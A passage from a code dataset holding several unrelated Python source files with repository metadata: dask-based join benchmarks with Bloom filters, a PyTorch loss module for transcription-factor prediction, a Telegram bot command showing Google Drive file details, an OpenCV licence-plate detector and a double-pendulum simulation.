f\"{year}-{month}-{day}T{hour}:{minute}:{second}\"\n\n\ndef redis_to_pandas(data) -> pd.DataFrame:\n df = pd.DataFrame().from_dict(data, orient=\"index\", columns=['raw_data'])\n df.sort_index(inplace=True)\n index_df = df.index\n\n # Convert the string to a dictionary while preserving the datetime object\n df = pd.DataFrame(df[\"raw_data\"].apply(\n lambda x: ast.literal_eval(x.replace('datetime.datetime', '').replace(\"(\", '\"').replace(\")\", '\"'))).tolist())\n df.index = index_df\n\n df[\"timestamp\"] = df[\"timestamp\"].apply(udf_reformat_to_iso)\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n df.reset_index(drop=False, inplace=True, names='counter')\n return df\n\n\ndef redis_to_pandas(data) -> pd.DataFrame:\n index_df = list(data.keys())\n values = [ast.literal_eval(x.replace('datetime.datetime', '').replace(\"(\", '\"').replace(\")\", '\"'))\n for x in data.values()]\n\n df = pd.DataFrame(values, index=index_df)\n df[\"timestamp\"] = df[\"timestamp\"].apply(udf_reformat_to_iso)\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n df.reset_index(drop=False, inplace=True, names='counter')\n\n return df\n\n\ndef sql_to_pandas(data) -> pd.DataFrame:\n df = pd.DataFrame(data, columns=['counter', 'user_id', 'timestamp'])\n df['user_id'] = df['user_id'].astype('int64')\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n return df\n\n\ndef timeit(func):\n @wraps(func)\n def timeit_wrapper(*args, **kwargs):\n start_time = time.perf_counter()\n result = func(*args, **kwargs)\n end_time = time.perf_counter()\n total_time = end_time - start_time\n print(f'Function {func.__name__} Took {total_time:.4f} seconds')\n\n return result\n\n return timeit_wrapper\n\n\nclass CustomJoinPipelines:\n\n def __init__(self):\n self.capacity = 0\n\n @delayed\n def perform_join(self, block1, block2, join_key):\n # Perform the join operation\n join_result = dd.merge(block1, block2, on=join_key, how='inner')\n return join_result\n\n @timeit\n def 
normal_join(self, df1, df2, join_key):\n # Assuming df1 and df2 are Pandas DataFrames\n timestamp_constraint = datetime.now() - relativedelta(years=2)\n\n # Apply the timestamp constraint and select columns\n filtered_df1 = df1[df1['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']]\n filtered_df2 = df2[df2['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']]\n\n # Perform the join operation\n final_result = filtered_df1.merge(filtered_df2, on='user_id', how='inner')\n\n return final_result\n\n @timeit\n def pipelined_hash_join(self, df1, df2, join_key, npartitions):\n print(f\"The number of partitions calculated {npartitions}\")\n\n df1 = dd.from_pandas(df1, npartitions=npartitions)\n df2 = dd.from_pandas(df2, npartitions=npartitions)\n\n df1['hash_value'] = df1['user_id'].apply(lambda x: x % npartitions)\n df2['hash_value'] = df2['user_id'].apply(lambda x: x % npartitions)\n\n # Set \"hash_value\" column as the index\n df1 = df1.set_index('hash_value')\n df2 = df2.set_index('hash_value')\n\n # Repartition the DataFrame based on the index\n blocks_df1 = df1.repartition(npartitions=npartitions)\n blocks_df2 = df2.repartition(npartitions=npartitions)\n\n timestamp_constraint = datetime.now() - relativedelta(years=2)\n\n # Concatenate the join results\n final_result = [\n self.perform_join(\n block1[block1['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']],\n block2[block2['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']],\n join_key\n )\n for block1, block2 in zip(blocks_df1.partitions, blocks_df2.partitions)\n ]\n # Compute and display the final result\n final_result = dd.compute(*final_result, num_workers=4)\n\n return final_result\n\n\n @timeit\n def semi_join(self, df1, df2, join_key, npartitions):\n\n df1 = dd.from_pandas(df1, npartitions=npartitions)\n df2 = dd.from_pandas(df2, npartitions=npartitions)\n\n timestamp_constraint = datetime.now() - relativedelta(years=2)\n\n df1 = df1.reset_index(drop=True)\n df1 = df1.drop(columns='counter')\n\n df2 = df2.reset_index(drop=True)\n df2 = df2.drop(columns='counter')\n\n # Apply the timestamp constraint and select columns\n df1 = df1[df1['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']]\n df2 = df2[df2['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']]\n\n df1 = df1.set_index(join_key).repartition(npartitions=npartitions)\n df2 = df2.set_index(join_key).repartition(npartitions=npartitions)\n\n semi_join_result = dd.merge(df1, df2, left_index=True, right_index=True, how='inner')\n semi_join_result = semi_join_result.dropna().compute()\n\n semi_join_result.reset_index(drop=False, inplace=True)\n\n return semi_join_result\n\n\n def create_bloom_filter(self, partition):\n bloom_filter = BloomFilter(capacity=self.capacity, error_rate=0.1)\n partition.loc[:, 'user_id'] = partition['user_id'].astype(\"string\")\n partition['user_id'].apply(bloom_filter.add)\n return bloom_filter\n\n def merge_bloom_filters(self, bloom_filters):\n bit_arrays = [pd.Series(bloomf.bitarray) for bloomf in bloom_filters.compute()]\n\n # Perform union using a loop\n union_bit_array = bit_arrays[0]\n for bit_array in bit_arrays[1:]:\n union_bit_array |= bit_array\n\n final_bloom_filter = BloomFilter(capacity=self.capacity, error_rate=0.1)\n final_bloom_filter.bitarray = bitarray(union_bit_array.astype(bool).tolist())\n\n return final_bloom_filter\n\n @timeit\n def intersection_bloom_filter_join(self, df1, df2, join_key, npartitions):\n start = time.time()\n\n df1[join_key] = 
df1[join_key].astype('string')\n df2[join_key] = df2[join_key].astype('string')\n\n df1 = dd.from_pandas(df1, npartitions=npartitions)\n df2 = dd.from_pandas(df2, npartitions=npartitions)\n\n self.capacity = max([df1['user_id'].compute().unique().shape[0], df2['user_id'].compute().unique().shape[0]])\n\n bloom_filter1 = df1.map_partitions(self.create_bloom_filter, meta=pd.DataFrame(columns=df1.columns))\n bloom_filter2 = df2.map_partitions(self.create_bloom_filter, meta=pd.DataFrame(columns=df2.columns))\n\n merged_bloom_filters = self.merge_bloom_filters(bloom_filter1).intersection(\n self.merge_bloom_filters(bloom_filter2))\n\n print(f\"total time to build the filter {time.time() - start}\")\n\n timestamp_constraint = datetime.now() - relativedelta(years=2)\n\n df1 = \\\n df1[(df1[join_key].apply(lambda x: x in merged_bloom_filters)) & (df1['timestamp'] >= timestamp_constraint)][\n [join_key, 'timestamp']]\n df2 = \\\n df2[(df2[join_key].apply(lambda x: x in merged_bloom_filters)) & (df2['timestamp'] >= timestamp_constraint)][\n [join_key, 'timestamp']]\n\n df1 = df1.compute()\n df2 = df2.compute()\n\n final_result = pd.merge(df1, df2, on=join_key, how='inner')\n\n return final_result\n", "repo_name": "kostasrazgkelis/DDPassigment", "sub_path": "test_directory/test_join_methods.py", "file_name": "test_join_methods.py", "file_ext": "py", "file_size_in_byte": 8888, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "warnings.filterwarnings", "line_number": 18, "usage_type": "call"}, {"api_name": "dask.tests.test_system.psutil.cpu_count", "line_number": 23, "usage_type": "call"}, {"api_name": "dask.tests.test_system.psutil", "line_number": 23, "usage_type": "name"}, {"api_name": "dask.tests.test_system.psutil.virtual_memory", "line_number": 24, "usage_type": "call"}, {"api_name": "dask.tests.test_system.psutil", "line_number": 24, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 70, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "attribute"}, {"api_name": "ast.literal_eval", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 87, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 94, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 93, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 103, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 105, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 101, "usage_type": "call"}, {"api_name": "dask.dataframe.merge", "line_number": 122, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 122, "usage_type": "name"}, {"api_name": "dask.delayed", "line_number": 119, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 128, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 128, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta", 
"line_number": 128, "usage_type": "call"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 144, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 144, "usage_type": "name"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 145, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 145, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 158, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 158, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 158, "usage_type": "call"}, {"api_name": "dask.dataframe.compute", "line_number": 170, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 170, "usage_type": "name"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 178, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 178, "usage_type": "name"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 179, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 179, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 181, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 181, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 181, "usage_type": "call"}, {"api_name": "dask.dataframe.merge", "line_number": 196, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 196, "usage_type": "name"}, {"api_name": "pybloom_live.BloomFilter", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 211, "usage_type": "call"}, {"api_name": "pybloom_live.BloomFilter", "line_number": 218, "usage_type": "call"}, {"api_name": "bitarray.bitarray", "line_number": 219, "usage_type": "call"}, {"api_name": "time.time", "line_number": 225, "usage_type": "call"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 230, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 230, "usage_type": "name"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 231, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 231, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 235, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 236, "usage_type": "call"}, {"api_name": "time.time", "line_number": 241, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 243, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 243, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 243, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 255, "usage_type": "call"}]}
+{"seq_id": "11282266863", "text": "import torch\nimport numpy as np\nis_gpu = False\nif torch.cuda.is_available():\n device = torch.device('cuda:0')\n is_gpu = True\nprint(\"is gpu \"+str(is_gpu))\n\nclass MOA():\n def __init__(self,data_obj,moa_factor,subset,beta):\n self.data_obj = data_obj\n tf_probing = (torch.eye(len(self.data_obj.tfs))).to(device)\n control_row = torch.zeros((1,len(self.data_obj.tfs))).to(device)\n self.probe = torch.cat((tf_probing,control_row),axis=0).to(device)\n self.moa_matrix = self.get_tf_gene_matrix()\n self.moa_factor = moa_factor\n self.subset = subset\n self.beta = beta\n\n def get_moa_loss(self,decoder):\n #create probe tensor\n moa_matrix = self.moa_matrix\n decoder_oputput = None\n mask = None\n probe = self.probe\n if self.subset != 0:\n selectedIndex = np.arange(len(self.data_obj.tfs))\n selectedIndex = np.random.permutation(selectedIndex)[0:self.subset]\n TF_index = selectedIndex.copy()\n selectedIndex = np.insert(selectedIndex,[-1],len(self.data_obj.tfs))\n\n moa_matrix = self.moa_matrix[TF_index,:]\n decoder_output = decoder(probe[selectedIndex,:])\n else:\n decoder_output = decoder(probe)\n mask = torch.logical_not(moa_matrix == 0)\n\n control_row = torch.masked_select(decoder_output[-1].repeat(moa_matrix.shape[0],1),mask)\n probe_rows = torch.masked_select(decoder_output[:-1],mask)\n\n diff = (probe_rows-control_row)\n #print(\"diff\",diff)\n\n moa_vals = torch.masked_select(moa_matrix,mask)\n\n violated = torch.logical_not(torch.eq(torch.sign(diff),moa_vals))\n violated_count = torch.count_nonzero(violated.int().detach()).detach()\n\n loss = torch.tensor(0.0, requires_grad = True)\n if torch.any(violated):\n violated_values = (torch.abs(diff))*violated.int()\n lossL1 = self.beta * torch.sum(torch.abs(violated_values))\n lossL2 = (1-self.beta) * torch.sum(torch.square(violated_values))\n loss = self.moa_factor * (lossL1 + lossL2)\n\n return loss,violated_count\n\n\n def get_tf_gene_matrix(self):\n gene_index_dict = {}\n for i in range(len(self.data_obj.overlap_list)):\n gene_index_dict[self.data_obj.overlap_list[i]] = i\n\n x_coords = []\n y_coords = []\n moa_val = []\n for i in range(len(self.data_obj.tfs)):\n tf = self.data_obj.tfs[i]\n tf_info = self.data_obj.tf_gene_dict[tf]\n for gene in tf_info.keys():\n gene_index = gene_index_dict[gene]\n moa = tf_info[gene]\n if moa != 0:\n x_coords.append(i)\n y_coords.append(gene_index)\n moa_val.append(moa)\n ind = [x_coords,y_coords]\n moa_matrix = torch.sparse_coo_tensor(ind,moa_val,([len(self.data_obj.tfs),len(self.data_obj.overlap_list)]))\n\n moa_matrix = moa_matrix.to_dense().to(device)\n\n return moa_matrix\n", "repo_name": "schaferd/Modular_DSCA_TF_Prediction", "sub_path": "moa.py", "file_name": "moa.py", "file_ext": "py", "file_size_in_byte": 3064, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.cuda.is_available", "line_number": 4, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 4, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 5, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, 
"usage_type": "attribute"}, {"api_name": "numpy.insert", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.logical_not", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.logical_not", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.eq", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.sign", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.count_nonzero", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.any", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.square", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.sparse_coo_tensor", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "42671392752", "text": "from pyrogram.types import Message\r\nfrom pyrogram.emoji import BACKHAND_INDEX_POINTING_DOWN, MAGNIFYING_GLASS_TILTED_LEFT\r\nfrom pydrive2.drive import GoogleDrive\r\nfrom ...configs.texts import RESULT_IN_COUNT\r\n\r\nasync def drive_count(msg: Message, drive: GoogleDrive):\r\n \r\n try:\r\n message = await msg.reply(f\"Buscando archivo {MAGNIFYING_GLASS_TILTED_LEFT}...\")\r\n file = drive.CreateFile({'id': msg.text.split(' ')[1].split('/')[-2]})\r\n file.FetchMetadata()\r\n \r\n result = RESULT_IN_COUNT.format(\r\n \r\n file['title'], \r\n int(file['fileSize']) / 1000000, \r\n file['fileExtension'], \r\n file['mimeType'])\r\n\r\n await message.edit(result)\r\n except Exception as e:\r\n await msg.reply(f\"Error en el comando /count: {BACKHAND_INDEX_POINTING_DOWN}\\n\\n{e}\")", "repo_name": "Tnoob-dev/GDrive-Project", "sub_path": "src/plugins/drive_modules/count.py", "file_name": "count.py", "file_ext": "py", "file_size_in_byte": 854, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pyrogram.types.Message", "line_number": 6, "usage_type": "name"}, {"api_name": "pydrive2.drive.GoogleDrive", "line_number": 6, "usage_type": "name"}, {"api_name": "pyrogram.emoji.MAGNIFYING_GLASS_TILTED_LEFT", "line_number": 9, "usage_type": "name"}, {"api_name": "configs.texts.RESULT_IN_COUNT.format", "line_number": 13, "usage_type": "call"}, {"api_name": "configs.texts.RESULT_IN_COUNT", "line_number": 13, "usage_type": "name"}, {"api_name": "pyrogram.emoji.BACKHAND_INDEX_POINTING_DOWN", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "17883424555", "text": "import cv2\nimport numpy as np\nimport math\nimport random\n\nimport MainScript\nimport EngineFiles.ReadChars as RC\nimport EngineFiles.Preprocessing as PP\nimport EngineFiles.PredictChar as PC\nimport EngineFiles.PredictPlate as PPL\n\nPLATE_WIDTH_PADDING_FACTOR = 1.3\nPLATE_HEIGHT_PADDING_FACTOR = 1.5\n\n\ndef lookupChars(img1):\n ListChars, countChars, imgC = [], 0, img1.copy()\n contours, hierC = cv2.findContours(imgC, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n h, w = img1.shape\n img1Cont = np.zeros((h,w,3), np.uint8)\n\n for i in range(len(contours)):\n if MainScript.showSteps == True:\n cv2.drawContours(img1Cont, contours, i, MainScript.BGR_white,)\n\n PredictChar = PC.PredictChar(contours[i])\n\n if RC.checkChar(PredictChar):\n countChars += 1\n ListChars.append(PredictChar)\n\n if MainScript.showSteps == True:\n print('\\nstep 2 - len(contours) =',len(contours))\n print('\\nstep 2 - countChars =', countChars)\n cv2.imshow('2a',img1Cont)\n\n return ListChars\n\n\ndef gainPlate(imgO, listChars):\n predictPlate = PPL.PredictPlate()\n listChars.sort(key = lambda mChar : mChar.centerX)\n flatPlateX = (listChars[0].centerX + listChars[len(listChars)-1].centerX) / 2\n flatPlateY = (listChars[0].centerY + listChars[len(listChars)-1].centerY) / 2\n coorPlateCenter = flatPlateX, flatPlateY\n PlateW = int((listChars[len(listChars) - 1].bRectX + listChars[len(listChars) - 1].bRectW - listChars[0].bRectX) * PLATE_WIDTH_PADDING_FACTOR)\n totalCharH = 0\n\n for i in listChars:\n totalCharH += i.bRectH\n\n flatAvgCharH = totalCharH / len(listChars)\n plateH = int(flatAvgCharH * PLATE_HEIGHT_PADDING_FACTOR)\n flatOpp = listChars[len(listChars) - 1].centerY - listChars[0].centerY\n flatHyp = RC.DistanceChars(listChars[0], listChars[len(listChars) - 1])\n flatCorrAngelRad = math.asin(flatOpp / flatHyp)\n flatCorrAngelDeg = flatCorrAngelRad * (180/math.pi)\n predictPlate.locPlate = (tuple(coorPlateCenter), (PlateW, plateH), flatCorrAngelDeg)\n rotMatrix = cv2.getRotationMatrix2D(tuple(coorPlateCenter), flatCorrAngelDeg, 1.0)\n h, w, numC = imgO.shape\n iRot = cv2.warpAffine(imgO, rotMatrix, (w, h))\n iCrop = cv2.getRectSubPix(iRot, (PlateW, plateH), tuple(coorPlateCenter))\n predictPlate.iPlate = iCrop\n\n return predictPlate\n\n\ndef CropPlates(img):\n ListPlates = []\n h, w, numC = img.shape\n\n GrayScale = np.zeros((h,w,1), np.uint8)\n thresh = np.zeros((h,w,1), np.uint8)\n contours = np.zeros((h,w,3), np.uint8)\n cv2.destroyAllWindows()\n\n if MainScript.showSteps == True:\n cv2.imshow('0', img)\n\n GrayScale, thresh = PP.preprocessing(img)\n\n if MainScript.showSteps == True:\n cv2.imshow('1a', GrayScale)\n cv2.imshow('1b', thresh)\n\n ListChars = lookupChars(thresh)\n\n if MainScript.showSteps == True:\n print('\\n Step 2 - length of ListChars =', len(ListChars))\n contours = np.zeros((h,w,3), np.uint8)\n Conts = []\n\n for n in ListChars:\n Conts.append(n.contour)\n\n cv2.drawContours(contours, Conts, -1, MainScript.BGR_white)\n cv2.imshow('2b', contours)\n\n FitChars = RC.DetectFitChars(ListChars)\n\n if MainScript.showSteps == True:\n print('\\nStep 3 - FitChars =', len(FitChars))\n contours = np.zeros((h,w,3), np.uint8)\n\n for i in FitChars:\n RandBlue = random.randint(0,255)\n RandGreen = random.randint(0,255)\n RandRed = random.randint(0,255)\n Conts = []\n\n for n in i:\n Conts.append(n.contour)\n\n cv2.drawContours(contours, Conts, -1, (RandBlue, RandGreen, RandRed))\n\n cv2.imshow('3', contours)\n\n for i in FitChars:\n predictPlate = gainPlate(img, 
i)\n\n if predictPlate.iPlate is not None:\n ListPlates.append(predictPlate)\n\n print(\"\\n\", len(ListPlates), \"possibilities found!\")\n\n if MainScript.showSteps == True:\n cv2.imshow(\"4a\", contours)\n\n for i in range(len(ListPlates)):\n p2fRpt = cv2.boxPoints(ListPlates[i].locPlate)\n cv2.line(contours, tuple(p2fRpt[0]), tuple(p2fRpt[1]), MainScript.BGR_red, 2)\n cv2.line(contours, tuple(p2fRpt[1]), tuple(p2fRpt[2]), MainScript.BGR_red, 2)\n cv2.line(contours, tuple(p2fRpt[2]), tuple(p2fRpt[3]), MainScript.BGR_red, 2)\n cv2.line(contours, tuple(p2fRpt[3]), tuple(p2fRpt[0]), MainScript.BGR_red, 2)\n cv2.imshow(\"4a\", contours)\n print(\"One of some predicted plate :\",i,\", click to continue!\")\n cv2.imshow('4b', ListPlates[i].iPlate)\n cv2.waitKey(0)\n\n print(\"\\nPlate detection complete!\")\n cv2.waitKey(0)\n\n return ListPlates", "repo_name": "devildances/ComputerVision-Plate_Recognition", "sub_path": "EngineFiles/ReadPlates.py", "file_name": "ReadPlates.py", "file_ext": "py", "file_size_in_byte": 4762, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.findContours", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.RETR_LIST", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 20, "usage_type": "attribute"}, {"api_name": "MainScript.showSteps", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 24, "usage_type": "call"}, {"api_name": "MainScript.BGR_white", "line_number": 24, "usage_type": "attribute"}, {"api_name": "EngineFiles.PredictChar.PredictChar", "line_number": 26, "usage_type": "call"}, {"api_name": "EngineFiles.PredictChar", "line_number": 26, "usage_type": "name"}, {"api_name": "EngineFiles.ReadChars.checkChar", "line_number": 28, "usage_type": "call"}, {"api_name": "EngineFiles.ReadChars", "line_number": 28, "usage_type": "name"}, {"api_name": "MainScript.showSteps", "line_number": 32, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 35, "usage_type": "call"}, {"api_name": "EngineFiles.PredictPlate.PredictPlate", "line_number": 41, "usage_type": "call"}, {"api_name": "EngineFiles.PredictPlate", "line_number": 41, "usage_type": "name"}, {"api_name": "EngineFiles.ReadChars.DistanceChars", "line_number": 55, "usage_type": "call"}, {"api_name": "EngineFiles.ReadChars", "line_number": 55, "usage_type": "name"}, {"api_name": "math.asin", "line_number": 56, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 57, "usage_type": "attribute"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.getRectSubPix", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 72, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 74, "usage_type": "attribute"}, {"api_name": "cv2.destroyAllWindows", "line_number": 75, "usage_type": "call"}, {"api_name": "MainScript.showSteps", 
"line_number": 77, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 78, "usage_type": "call"}, {"api_name": "EngineFiles.Preprocessing.preprocessing", "line_number": 80, "usage_type": "call"}, {"api_name": "EngineFiles.Preprocessing", "line_number": 80, "usage_type": "name"}, {"api_name": "MainScript.showSteps", "line_number": 82, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 84, "usage_type": "call"}, {"api_name": "MainScript.showSteps", "line_number": 88, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 90, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 96, "usage_type": "call"}, {"api_name": "MainScript.BGR_white", "line_number": 96, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 97, "usage_type": "call"}, {"api_name": "EngineFiles.ReadChars.DetectFitChars", "line_number": 99, "usage_type": "call"}, {"api_name": "EngineFiles.ReadChars", "line_number": 99, "usage_type": "name"}, {"api_name": "MainScript.showSteps", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 103, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 106, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 107, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 114, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 116, "usage_type": "call"}, {"api_name": "MainScript.showSteps", "line_number": 126, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 127, "usage_type": "call"}, {"api_name": "cv2.boxPoints", "line_number": 130, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 131, "usage_type": "call"}, {"api_name": "MainScript.BGR_red", "line_number": 131, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 132, "usage_type": "call"}, {"api_name": "MainScript.BGR_red", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 133, "usage_type": "call"}, {"api_name": "MainScript.BGR_red", "line_number": 133, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 134, "usage_type": "call"}, {"api_name": "MainScript.BGR_red", "line_number": 134, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 138, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 141, "usage_type": "call"}]}
+{"seq_id": "17313020901", "text": "'''\ndate: 08/03/22\nexercise: 8.15\n\ndesc: solves the double pendulum system using fourth-order runge kutta, plots the system's energy over time, and animates \nthe system \n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom math import cos,sin,pi\nfrom matplotlib.animation import FuncAnimation\nplt.style.use('dark_background')\n\nl = 0.4 \nm = 1\ng = 9.8\nt0,tf = 0.0,100.0\nN = 10000\nh = 1e-3\nt_points = np.linspace(t0,tf,N)\nr = np.empty((4,N),float)\nr[:,0] = [pi/2,pi/2,0,0]\n\ndw1 = lambda r: -( pow(r[2],2)*sin(2*r[0]-2*r[1]) + 2*pow(r[3],2)*sin(r[0]-r[1]) + (g/l)*(sin(r[0]-2*r[1]) + 3*sin(r[0])) )/( 3 - cos(2*r[0]-2*r[1]) )\ndw2 = lambda r: ( 4*pow(r[2],2)*sin(r[0]-r[1]) + pow(r[3],2)*sin(2*r[0]-2*r[1]) + 2*(g/l)*(sin(2*r[0]-r[1]) - sin(r[1])) )/( 3 - cos(2*r[0]-2*r[1]) )\nf = lambda r,t: np.array( [r[2],r[3],dw1(r),dw2(r)] )\n\nfor t in range(N-1):\n rt = r[:,t]\n tt = t_points[t]\n k1 = h*f(rt,tt)\n k2 = h*f(rt+0.5*k1,tt+0.5*h)\n k3 = h*f(rt+0.5*k2,tt+0.5*h)\n k4 = h*f(rt+k3,tt+h)\n r[:,t+1] = rt + (k1 + 2*k2 + 2*k3 + k4)/6.0\n\n\nE = [-m*g*l*(2*cos(2*r[0,t])+cos(r[1,t])) + m*pow(l,2)*(r[2,t]**2 + 0.5*r[3,t]**2 + r[2,t]*r[3,t]*cos(r[0,t]-r[1,t])) for t in range(N)]\nplt.plot(t_points,E)\nplt.show() \n\nn = 1000\nfig,ax = plt.subplots(1,figsize=(7,6))\npos1 = np.array ( [[ l*sin(r[0,t]) for t in range(N) ],[-l*cos(r[0,t]) for t in range(N)]])\npos2 = np.array([[l*(sin(r[0,t])+sin(r[1,t])) for t in range(N) ],[-l*(cos(r[0,t])+cos(r[1,t])) for t in range(N)]])\npivot, = ax.plot([0],[0],'wo',zorder=2)\nm1, = 